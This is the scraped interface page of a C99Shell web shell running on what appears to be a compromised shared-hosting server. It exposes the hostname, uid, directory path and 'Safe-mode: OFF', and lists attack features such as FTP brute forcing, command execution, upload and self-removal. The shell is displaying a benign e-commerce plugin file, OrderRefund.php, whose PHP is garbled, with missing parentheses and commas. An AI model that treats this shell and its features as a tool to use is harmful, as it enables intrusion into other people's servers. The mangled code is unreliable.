!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/var/softaculous/sitepad/editor/site-data/plugins/kkart-pro/packages/kkart-admin/src/Overrides/   drwxr-xr-x
Free 291.63 GB of 429.69 GB (67.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     OrderRefund.php (1.84 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * KKART Admin Order Refund
 *
 * KKART Admin Order Refund class that adds some functionality on top of general Kkart KKART_Order_Refund.
 */

namespace Automattic\Kkart\Admin\Overrides;

defined'ABSPATH' ) || exit;

use \
Automattic\Kkart\Admin\API\Reports\Customers\DataStore as CustomersDataStore;

/**
 * KKART_Order_Refund subclass.
 */
class OrderRefund extends \KKART_Order_Refund {
    
/**
     * Order traits.
     */
    
use OrderTraits;

    
/**
     * Add filter(s) required to hook this class to substitute KKART_Order_Refund.
     */
    
public static function add_filters() {
        
add_filter'kkart_order_class', array( __CLASS__'order_class_name' ), 10);
    }

    
/**
     * Filter function to swap class KKART_Order_Refund for this one in cases when it's suitable.
     *
     * @param string $classname Name of the class to be created.
     * @param string $order_type Type of order object to be created.
     * @param number $order_id Order id to create.
     *
     * @return string
     */
    
public static function order_class_name$classname$order_type$order_id ) {
        
// @todo - Only substitute class when necessary (during sync).
        
if ( 'KKART_Order_Refund' === $classname ) {
            return 
'\Automattic\Kkart\Admin\Overrides\OrderRefund';
        } else {
            return 
$classname;
        }
    }

    
/**
     * Get the customer ID of the parent order used for reports in the customer lookup table.
     *
     * @return int|bool Customer ID of parent order, or false if parent order not found.
     */
    
public function get_report_customer_id() {
        
$parent_order kkart_get_order$this->get_parent_id() );

        if ( ! 
$parent_order ) {
            return 
false;
        }

        return 
CustomersDataStore::get_or_create_customer_from_order$parent_order );
    }

    
/**
     * Returns null since refunds should not be counted towards returning customer counts.
     *
     * @return null
     */
    
public function is_returning_customer() {
        return 
null;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0036 ]--